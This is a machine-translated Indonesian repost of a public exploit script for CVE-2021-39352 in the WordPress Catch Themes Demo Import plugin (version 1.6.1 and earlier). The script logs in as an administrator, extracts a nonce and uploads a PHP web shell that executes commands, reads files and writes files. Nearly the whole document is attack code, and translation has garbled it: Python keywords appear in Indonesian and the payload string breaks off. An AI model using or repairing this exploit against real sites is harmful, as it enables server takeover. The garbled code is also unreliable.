WordPress Catch Themes Demo Impor 1.6.1 Unggah Shell

  • Whatsapp
WordPress Catch Themes Demo Impor 1.6.1 Unggah Shell
WordPress Catch Themes Demo Impor Unggah Shell

[*]News.nextcloud.asia

# Judul Eksploitasi: Plugin WordPress Tangkap Tema Demo Impor 1.6.1 – Eksekusi Kode Jarak Jauh (RCE) (Diotentikasi)
# Tanggal 07.12.2021
# Eksploitasi Penulis: Ron Jost (Hacker5preme)
# Beranda Vendor: https://wordpress.org/plugins/catch-themes-demo-import/
# Tautan Perangkat Lunak: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip
# Versi: <= 1.6.1
# Diuji pada: Ubuntu 18.04
# CVE: CVE-2021-39352
# CWE: CWE-434
# Dokumentasi: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md

”’
Keterangan:
Plugin Catch Themes Demo Import WordPress rentan terhadap unggahan file sewenang-wenang melalui fungsi impor
ditemukan di file ~/inc/CatchThemesDemoImport.php, dalam versi hingga 1.7,
karena validasi jenis file yang tidak memadai. Ini memungkinkan penyerang dengan hak administratif untuk mengunggah
file berbahaya yang dapat digunakan untuk mencapai eksekusi kode jarak jauh.
”’

# Spanduk:
spanduk = “””
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
|| C ||| V ||| E ||| – ||| 2 ||| 0 ||| 2 ||| 1 ||| – ||| 3 ||| 9 ||| 9 ||| 3 ||| 5 ||| 2 ||
||__|||__|||__|||__|||__||__|||__|||__|||__||__|||__|||__||| __|||__||
|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/ __|/__|

[+] Tangkap Tema Demo Impor RCE (Diotentikasi)
[@] Dikembangkan oleh Ron Jost (Hacker5preme)

“””
cetak (spanduk)

impor argparse
permintaan impor
dari datetime impor datetime

# Masukan Pengguna:
my_parser = argparse.ArgumentParser(description=’Wordpress Plugin Catch Themes Demo Impor – RCE (Diotentikasi)’)
my_parser.add_argument(‘-T’, ‘–IP’, type=str)
my_parser.add_argument(‘-P’, ‘–PORT’, type=str)
my_parser.add_argument(‘-U’, ‘–PATH’, type=str)
my_parser.add_argument(‘-u’, ‘–USERNAME’, type=str)
my_parser.add_argument(‘-p’, ‘–PASSWORD’, ketik=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
nama pengguna = args.USERNAME
kata sandi = args.PASSWORD
mencetak(”)
mencetak(‘[*] Mulai Eksploitasi pada: ‘ + str(datetime.now().strftime(‘%H:%M:%S’)))
mencetak(”)

# Autentikasi:
sesi = permintaan.Sesi()
auth_url=”http://” + target_ip + ‘:’ + target_port + wp_path + ‘wp-login.php’
periksa = session.get(auth_url)
# Judul:
kepala = {
‘Host’: target_ip,
‘User-Agent’: ‘Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0’,
‘Terima’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’,
‘Bahasa Terima’: ‘de, en-US; q = 0,7, en; q = 0,3’,
‘Terima-Encoding’: ‘gzip, deflate’,
‘Jenis Konten’: ‘aplikasi/x-www-form-urlencoded’,
‘Asal’: ‘http://’ + target_ip,
‘Koneksi’: ‘tutup’,
‘Permintaan-Upgrade-Tidak Aman’: ‘1’
}

# Tubuh:
tubuh = {
‘log’: nama pengguna,
‘pwd’: kata sandi,
‘wp-kirim’: ‘Masuk’,
‘kuki tes’: ‘1’
}
auth = session.post(auth_url, headers=header, data=body)

# Dapatkan nilai Keamanan nonce:
periksa = session.get(‘http://’ + target_ip + ‘:’ + target_port + wp_path+ ‘wp-admin/themes.php?page=catch-themes-demo-import’).text
nonce = cek[check.find(‘ajax_nonce”‘) + 13:]
wp_nonce = nonce[:nonce.find(‘”‘)]
cetak (wp_nonce)

# Eksploitasi:
exploit_url=”http://” + target_ip + ‘:’ + target_port + wp_path + ‘wp-admin/admin-ajax.php’

# Tajuk (Eksploitasi):
kepala = {
“User-Agent”: “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0”,
“Menerima”: “*/*”,
“Bahasa Terima”: “de, en-US; q = 0,7, en; q = 0,3”,
“Accept-Encoding”: “gzip, deflate”,
‘Perujuk’: ‘http://’ + target_ip + ‘/wordpress/wp-admin/themes.php?page=catch-themes-demo-import’,
“X-Diminta-Dengan”: “XMLHttpRequest”,
“Content-Type”: “multipart/form-data; boundary=—————————121585879226594965303252407916”,
“Asal”: “http://” + target_ip,
“Koneksi”: “tutup”
}

# Eksploitasi Payload (Menggunakan p0wny shell: https://github.com/flozz/p0wny-shell):
shell_payload = “——————121585879226594965303252407916rnContent-Disposition: form-data; name=”action “rnrnctdi_import_demo_datarn—————————–121585879226594965303252407916rnDisposisi Konten: form-data; name=”keamanan”rnrn” + wp_nonce + “rn———————- ——-121585879226594965303252407916rnContent-Disposition: form-data; name=”selected”rnrnundefinedrn———— —————–121585879226594965303252407916rnContent-Disposition: form-data; name=”content_file”; filename=”shell.php”rnContent -Tipe: application/x-phprnrn&1)?$/”, $cmd)) {n chdir($cwd);n preg_match(“/^\s*cd\s+([^\s]+)\s*(2>&1)?$/”, $cmd, $match);n chdir($match[1]);n } elseif (preg_match(“/^\s*download\s+[^\s]+\s*(2>&1)?$/”, $cmd)) {n chdir($cwd);n preg_match(“/^\s*download\s+([^\s]+)\s*(2>&1)?$/”, $cmd, $match);n mengembalikan fiturDownload($match[1]);n } else {n chdir($cwd);n exec($cmd, $stdout);n }nn mengembalikan array(n “stdout” => $stdout,n “cwd” => getcwd()n );n}nnfungsi featurePwd() {n return array(“cwd” => getcwd());n}nnfungsi featureHint ($fileName, $cwd, $type) {n chdir($cwd);n if ($type == ‘cmd’) {n $cmd = “compgen -c $fileName”;n } else {n $cmd = “compgen -f $fileName”;n }n $cmd = “/bin/bash -c \”$cmd\””;n $file = meledak(“\n”, shell_exec($cmd));n mengembalikan array(n ‘file’ => $file,n );n}nnfungsi fiturDownload($filePath) { n $file = @file_get_contents($filePath);n if ($file === FALSE) {n return array(n ‘stdout’ => array(‘File tidak ditemukan / tidak ada izin baca.’), n ‘cwd’ => getcwd()n );n } else {n return array(n ‘name’ => basename($filePath),n ‘file’ => base64_encode($file) n );n }n}nnfungsi featureUpload($path, $file, $cwd) {n chdir($cwd);n $f = @fopen($path, ‘wb’); n if ($f === FALSE) {n return array(n ‘stdout’ => array(‘Jalur tidak valid / tidak ada izin menulis .’),n ‘cwd’ => getcwd()n );n } else {n fwrite($f, base64_decode($file));n fclose($f);n return array( n ‘stdout’ => array(‘Selesai.’),n ‘cwd’ => getcwd()n );n }n}nnif (isset($_GET[“feature”])) {nn $respons = NULL;nn beralih ($_GET[“feature”]) {n case “shell”:n $cmd = $_POST[‘cmd’];n if (!preg_match(‘/2>/’, $cmd)) {n $cmd .= ‘ 2>&1’;n }n $respons = featureShell($cmd, $_POST[“cwd”]);n break;n case “pwd”:n $response = featurePwd();n break;n case “hint”:n $response = featureHint($_POST[‘filename’], $_POST[‘cwd’], $_POST[‘type’]);n break;n case ‘upload’:n $respons = featureUpload($_POST[‘path’], $_POST[‘file’], $_POST[‘cwd’]);n }nn header(“Jenis Konten: application/json”);n echo json_encode($response);n die();n}nn?>nnnn n n [email protected]:~#n n